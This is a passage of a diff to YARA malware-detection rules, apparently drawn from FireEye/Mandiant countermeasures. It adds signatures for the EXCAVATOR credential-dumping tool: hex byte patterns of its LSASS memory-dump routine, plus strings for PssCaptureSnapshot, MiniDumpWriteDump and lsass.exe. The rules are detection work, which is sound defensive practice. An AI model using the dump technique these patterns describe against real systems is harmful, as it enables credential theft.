?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 78 48 8D 45 80 41 B9 02 ?? ?? ?? 48 89 44 24 28 45 33 C0 C7 44 24 2? ?2 ?? ?? ?? 41 8D 51 09 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 33 C9 41 8D 5? ?1 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 4C 8B 44 24 68 33 D2 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 48 8B C8 41 8D 5? ?1 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 89 74 24 30 4C 8D 4C 24 70 4C 89 74 24 28 33 D2 41 ?? ?? ?? ?? ?? 48 C7 44 24 2? ?8 ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4D 80 48 8D 45 88 48 89 44 24 50 4C ?? ?? ?? ?? ?? ?? 48 8D 45 A0 48 89 7D 08 48 89 44 24 48 45 33 C9 4C 89 74 24 40 33 D2 4C 89 74 24 38 C7 ?? ?? ?? ?? ?? ?? ?? 44 89 74 24 28 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 70 8B 5D 98 FF ?? ?? ?? ?? ?? 48 8B 4D 88 FF ?? ?? ?? ?? ?? 48 8B 4D 90 FF ?? ?? ?? ?? ?? 44 8B C3 33 D2 B9 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 74 ?? BA ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? B8 01 ?? ?? ?? EB ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF FF ?? ?? ?? ?? ?? 33 C0 48 8B 9C 24 3? ?1 ?? ?? 48 8B 4D 10 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 2? ?1 ?? ?? 49 8B 73 18 49 8B 7B 20 4D 8B 73 28 49 8B E3 5D C3 }
+		$bytes3 = { 48 89 74 24 10 48 89 7C 24 18 4C 89 74 24 20 55 48 8D 6C 24 E0 48 81 EC 2? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 45 10 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 60 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 68 0F 11 45 A0 41 8B FE 4C 89 74 24 70 0F 11 45 B0 0F 11 45 C0 0F 11 45 D0 0F 11 45 E0 0F 11 45 F0 0F 11 45 ?? FF ?? ?? ?? ?? ?? 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 9C 24 3? ?1 ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 66 0F 1F 84 ?? ?? ?? ?? ?? 48 8B 4C 24 60 FF ?? ?? ?? ?? ?? 3B C6 74 ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? EB ?? 48 8B 44 24 60 48 89 44 24 70 66 0F 6F 15 6D A? ?1 ?? 48 ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 90 F3 0F 6F 40 F0 48 8D 40 40 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 B0 66 0F 6F CA F3 0F 6F 40 C0 66 0F EF C8 F3 0F 7F 48 C0 66 0F 6F CA F3 0F 6F 40 D0 66 0F EF C8 F3 0F 7F 48 D0 F3 0F 6F 40 E0 66 0F EF C2 F3 0F 7F 40 E0 48 83 E9 01 75 ?? FF ?? ?? ?? ?? ?? 4C 8D 44 24 78 BA 0A ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 78 48 8D 45 80 41 B9 02 ?? ?? ?? 48 89 44 24 28 45 33 C0 C7 44 24 2? ?2 ?? ?? ?? 41 8D 51 09 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 33 C9 41 8D 5? ?1 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 4C 8B 44 24 68 33 D2 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 48 8B C8 41 8D 5? ?1 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 89 74 24 30 4C 8D 4C 24 70 4C 89 74 24 28 33 D2 41 ?? ?? ?? ?? ?? 48 C7 44 24 2? ?8 ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4D 80 48 8D 45 88 48 89 44 24 50 4C ?? ?? ?? ?? ?? ?? 48 8D 45 A0 48 89 7D 08 48 89 44 24 48 45 33 C9 4C 89 74 24 40 33 D2 4C 89 74 24 38 C7 ?? ?? ?? ?? ?? ?? ?? 44 89 74 24 28 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 70 8B 5D 98 FF ?? ?? ?? ?? ?? 48 8B 4D 88 FF ?? ?? ?? ?? ?? 48 8B 4D 90 FF ?? ?? ?? ?? ?? 44 8B C3 33 D2 B9 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 74 ?? BA ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? B8 01 ?? ?? ?? EB ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF FF ?? ?? ?? ?? ?? 33 C0 48 8B 9C 24 3? ?1 ?? ?? 48 8B 4D 10 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 2? ?1 ?? ?? 49 8B 73 18 49 8B 7B 20 4D 8B 73 28 49 8B E3 5D C3 }
+		$bytes4 = { 48 89 74 24 ?? 48 89 7C 24 ?? 4C 89 74 24 ?? 55 48 8D 6C 24 ?? 48 81 EC 20 01 00 00 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 45 ?? 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 ?? 48 8D 0D ?? ?? ?? ?? 4C 89 74 24 ?? 0F 11 45 ?? 41 8B FE 4C 89 74 24 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 48 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 ?? 66 66 0F 1F 84 00 ?? ?? 00 00 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 3B C6 74 ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 ?? EB ?? 48 8B 44 24 ?? 48 89 44 24 ?? 66 0F 6F 15 ?? ?? 01 00 48 8D 05 ?? ?? ?? ?? B9 C8 05 00 00 90 F3 0F 6F 40 ?? 48 8D 40 ?? 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 ?? 66 0F 6F CA F3 0F 6F 40 ?? 66 0F EF C8 F3 0F 7F 48 ?? 66 0F 6F CA F3 0F 6F 40 ?? 66 0F EF C8 F3 0F 7F 48 ?? F3 0F 6F 40 ?? 66 0F EF C2 F3 0F 7F 40 ?? 48 83 E9 01 75 ?? FF 15 ?? ?? ?? ?? 4C 8D 44 24 ?? BA 0A 00 00 00 48 8B C8 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 45 ?? 41 B9 02 00 00 00 48 89 44 24 ?? 45 33 C0 C7 44 24 ?? 02 00 00 00 41 8D 51 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 ?? 33 C9 41 8D 50 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B 44 24 ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 ?? 48 8B C8 41 8D 50 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 89 74 24 ?? 4C 8D 4C 24 ?? 4C 89 74 24 ?? 33 D2 41 B8 00 00 02 00 48 C7 44 24 ?? 08 00 00 00 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8D 45 ?? 48 89 44 24 ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 45 ?? 48 89 7D ?? 48 89 44 24 ?? 45 33 C9 4C 89 74 24 ?? 33 D2 4C 89 74 24 ?? C7 44 24 ?? 04 00 08 00 44 89 74 24 ?? 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 8B 5D ?? FF 15 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 44 8B C3 33 D2 B9 3A 04 00 00 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 74 ?? BA FF FF FF FF 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF FF 15 ?? ?? ?? ?? 33 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 4D ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 73 ?? 49 8B 7B ?? 4D 8B 73 ?? 49 8B E3 5D C3 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and any of ( $bytes* )
 }
-rule FIREEYE_RT_Builder_MSIL_Sharpgenerator_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_Win64_EXCAVATOR_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharpGenerator' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "ab661cba-f695-59d2-9071-9b9a90233457"
-		date = "2020-12-09"
+		id = "e593b589-747d-53c2-a39a-57485e4f7641"
+		date = "2020-11-30"
+		date = "2020-11-30"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPGENERATOR/production/yara/Builder_MSIL_SharpGenerator_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/APT_HackTool_Win64_EXCAVATOR_1.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "6dc0780e54d33df733aadc8a89077232baa63bf1cbe47c5d164c57ce3185dd71"
+		hash = "6a9a114928554c26675884eeb40cc01b"
+		logic_hash = "aa06628ddef0f95c4217b97a3476a0ee12e00d04c4827a512730598f3c80f1f6"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$typelibguid0 = "3f450977-d796-4016-bb78-c9e91c6a0f08" ascii nocase wide
+		$api1 = "PssCaptureSnapshot" fullword
+		$api2 = "MiniDumpWriteDump" fullword
+		$dump = { BA FD 03 00 AC [0-8] 41 B8 1F 00 10 00 48 8B ?? FF 15 [4] 85 C0 0F 85 [2] 00 00 [0-2] 48 8D 05 [5] 89 ?? 24 30 ( C7 44 24 28 80 00 00 00 48 8D 0D ?? ?? ?? ?? | 48 8D 0D ?? ?? ?? ?? C7 44 24 28 80 00 00 00 ) 45 33 C9 [0-5] 45 33 C0 C7 44 24 20 01 00 00 00 BA 00 00 00 10 [0-10] FF 15 [4] 48 8B ?? 48 83 F8 FF ( 74 | 0F 84 ) [1-4] 48 8B 4C 24 ?? 48 8D 44 24 ?? 48 89 44 24 30 ( 41 B9 02 00 00 00 | 44 8D 4D 02 ) ?? 89 ?? 24 28 4C 8B ?? 8B [2] 89 ?? 24 20 FF 15 [4] 48 8B ?? FF 15 [4] 48 8B ?? FF 15 [4] FF 15 [4] 48 8B 54 24 ?? 48 8B C8 FF 15 }
+		$lsass = { 6C 73 61 73 [6] 73 2E 65 78 [6] 65 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		(( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) ) and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Rubeus_1 : FILE
+rule FIREEYE_RT_Credtheft_Win_EXCAVATOR_2 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public Rubeus project."
+		description = "This rule looks for the binary signature of the routine that calls PssFreeSnapshot found in the Excavator-Reflector DLL."
 		author = "FireEye"
-		id = "0ca140ea-2b9f-5904-a4c0-8615229626f0"
+		id = "89037b9a-78b0-5a8c-bb60-3d54842d81e1"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/RUBEUS/production/yara/HackTool_MSIL_Rubeus_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/CredTheft_Win_EXCAVATOR_2.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "66e0681a500c726ed52e5ea9423d2654"
-		logic_hash = "ad954f9922ab564d68cb4515b080f6ee69476a8d87f0038e2ae4c222f0e182d7"
+		hash = "6a9a114928554c26675884eeb40cc01b"
+		logic_hash = "408e8862f0c470105648fdba00dc5531ffcd739fa544f89acb70f0fa1b105c03"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 4
+		rev = 3
 
 	strings:
-		$typelibguid = "658C8B7F-3664-4A95-9572-A3E5871DFC06" ascii nocase wide
+		$bytes1 = { 4C 89 74 24 20 55 48 8D AC 24 60 FF FF FF 48 81 EC A0 01 00 00 48 8B 05 4C 4A 01 00 48 33 C4 48 89 85 90 00 00 00 BA 50 00 00 00 C7 05 CB 65 01 00 43 00 3A 00 66 89 15 EC 65 01 00 4C 8D 44 24 68 48 8D 15 D8 68 01 00 C7 05 B2 65 01 00 5C 00 57 00 33 C9 C7 05 AA 65 01 00 69 00 6E 00 C7 05 A4 65 01 00 64 00 6F 00 C7 05 9E 65 01 00 77 00 73 00 C7 05 98 65 01 00 5C 00 4D 00 C7 05 92 65 01 00 45 00 4D 00 C7 05 8C 65 01 00 4F 00 52 00 C7 05 86 65 01 00 59 00 2E 00 C7 05 80 65 01 00 44 00 4D 00 C7 05 72 68 01 00 53 00 65 00 C7 05 6C 68 01 00 44 00 65 00 C7 05 66 68 01 00 42 00 75 00 C7 05 60 68 01 00 47 00 50 00 C7 05 5A 68 01 00 72 00 69 00 C7 05 54 68 01 00 56 00 69 00 C7 05 4E 68 01 00 4C 00 45 00 C7 05 48 68 01 00 67 00 65 00 C7 05 12 67 01 00 6C 73 61 73 C7 05 0C 67 01 00 73 2E 65 78 C6 05 09 67 01 00 65 FF 15 63 B9 00 00 45 33 F6 85 C0 74 66 48 8B 44 24 68 48 89 44 24 74 C7 44 24 70 01 00 00 00 C7 44 24 7C 02 00 00 00 FF 15 A4 B9 00 00 48 8B C8 4C 8D 44 24 48 41 8D 56 20 FF 15 1A B9 00 00 85 C0 74 30 48 8B 4C 24 48 4C 8D 44 24 70 4C 89 74 24 28 45 33 C9 33 D2 4C 89 74 24 20 FF 15 EF B8 00 00 FF 15 11 B9 00 00 48 8B 4C 24 48 FF 15 16 B9 00 00 48 89 9C 24 B0 01 00 00 48 8D 0D BF 2E 01 00 48 89 B4 24 B8 01 00 00 4C 89 74 24 40 FF 15 1C B9 00 00 48 85 C0 0F 84 B0 00 00 00 48 8D 15 AC 2E 01 00 48 8B C8 FF 15 1B B9 00 00 48 8B D8 48 85 C0 0F 84 94 00 00 00 33 D2 48 8D 4D 80 41 B8 04 01 00 00 E8 06 15 00 00 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 63 66 0F 1F 44 00 00 48 8B 4C 24 40 4C 8D 45 80 41 B9 04 01 00 00 33 D2 FF 15 89 B8 00 00 48 8D 15 F2 65 01 00 48 8D 4D 80 E8 49 0F 00 00 48 85 C0 75 38 33 D2 48 8D 4D 80 41 B8 04 01 00 00 E8 A3 14 00 00 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 A3 33 C0 E9 F5 00 00 00 48 8B 5C 24 40 48 8B CB FF 15 5E B8 00 00 8B F0 48 85 DB 74 E4 85 C0 74 E0 4C 8D 4C 24 50 48 89 BC 24 C0 01 00 00 BA FD 03 00 AC 41 B8 1F 00 10 00 48 8B CB FF 15 12 B8 00 00 85 C0 0F 85 A0 00 00 00 48 8D 05 43 FD FF FF 4C 89 74 24 30 C7 44 24 28 80 00 00 00 48 8D 0D 3F 63 01 00 45 33 C9 48 89 44 24 58 45 33 C0 C7 44 24 20 01 00 00 00 BA 00 00 00 10 4C 89 74 24 60 FF 15 E4 B7 00 00 48 8B F8 48 83 F8 FF 74 59 48 8B 4C 24 50 48 8D 44 24 58 48 89 44 24 30 41 B9 02 00 00 00 4C 89 74 24 28 4C 8B C7 8B D6 4C 89 74 24 20 FF 15 B1 B9 00 00 48 8B CB FF 15 78 B7 00 00 48 8B CF FF 15 6F B7 00 00 FF 15 B1 B7 00 00 48 8B 54 24 50 48 8B C8 FF 15 53 B7 00 00 33 C9 FF 15 63 B7 00 00 CC 48 8B CB FF 15 49 B7 00 00 48 8B BC 24 C0 01 00 00 33 C0 48 8B B4 24 B8 01 00 00 48 8B 9C 24 B0 01 00 00 48 8B 8D 90 00 00 00 48 33 CC E8 28 00 00 00 4C 8B B4 24 C8 01 00 00 48 81 C4 A0 01 00 00 5D C3 }
+		$bytes2 = { 4C 89 74 24 20 55 48 8D AC 24 60 FF FF FF 48 81 EC A? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 85 9? ?? ?? ?0 BA ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 89 ?? ?? ?? ?? ?? 4C 8D 44 24 68 48 ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C6 ?? ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 45 33 F6 85 C0 74 ?? 48 8B 44 24 68 48 89 44 24 74 C7 44 24 7? ?1 ?? ?? ?? C7 44 24 7C 02 ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B C8 4C 8D 44 24 48 41 8D 56 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 48 4C 8D 44 24 70 4C 89 74 24 28 45 33 C9 33 D2 4C 89 74 24 20 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 4C 24 48 FF ?? ?? ?? ?? ?? 48 89 9C 24 B? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 B4 24 B8 01 ?? ?? 4C 89 74 24 40 FF ?? ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 0F 1F 44 ?? ?? 48 8B 4C 24 40 4C 8D 45 80 41 ?? ?? ?? ?? ?? 33 D2 FF ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8D 4D 80 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 5C 24 40 48 8B CB FF ?? ?? ?? ?? ?? 8B F0 48 85 DB 74 ?? 85 C0 74 ?? 4C 8D 4C 24 50 48 89 BC 24 C? ?1 ?? ?? BA ?? ?? ?? ?? 41 ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 30 C7 ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 45 33 C9 48 89 44 24 58 45 33 C0 C7 44 24 2? ?1 ?? ?? ?? BA ?? ?? ?? ?? 4C 89 74 24 60 FF ?? ?? ?? ?? ?? 48 8B F8 48 83 F8 FF 74 ?? 48 8B 4C 24 50 48 8D 44 24 58 48 89 44 24 30 41 B9 02 ?? ?? ?? 4C 89 74 24 28 4C 8B C7 8B D6 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 54 24 50 48 8B C8 FF ?? ?? ?? ?? ?? 33 C9 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 48 8B BC 24 C? ?1 ?? ?? 33 C0 48 8B B4 24 B8 01 ?? ?? 48 8B 9C 24 B? ?1 ?? ?? 48 8B 8D 9? ?? ?? ?0 48 33 CC E8 ?? ?? ?? ?? 4C 8B B4 24 C8 01 ?? ?? 48 81 C4 A? ?1 ?? ?? 5D C3 }
+		$bytes3 = { 4C 89 74 24 20 55 48 8D AC 24 60 FF FF FF 48 81 EC A? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 85 9? ?? ?? ?0 BA ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 66 89 ?? ?? ?? ?? ?? 4C 8D 44 24 68 48 ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? ?? ?? C6 ?? ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 45 33 F6 85 C0 74 ?? 48 8B 44 24 68 48 89 44 24 74 C7 44 24 7? ?1 ?? ?? ?? C7 44 24 7C 02 ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B C8 4C 8D 44 24 48 41 8D 56 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 48 4C 8D 44 24 70 4C 89 74 24 28 45 33 C9 33 D2 4C 89 74 24 20 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B 4C 24 48 FF ?? ?? ?? ?? ?? 48 89 9C 24 B? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 B4 24 B8 01 ?? ?? 4C 89 74 24 40 FF ?? ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 0F 1F 44 ?? ?? 48 8B 4C 24 40 4C 8D 45 80 41 ?? ?? ?? ?? ?? 33 D2 FF ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 8D 4D 80 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 33 D2 48 8D 4D 80 41 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 40 48 8D 44 24 40 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? 33 C0 E9 ?? ?? ?? ?? 48 8B 5C 24 40 48 8B CB FF ?? ?? ?? ?? ?? 8B F0 48 85 DB 74 ?? 85 C0 74 ?? 4C 8D 4C 24 50 48 89 BC 24 C? ?1 ?? ?? BA ?? ?? ?? ?? 41 ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 4C 89 74 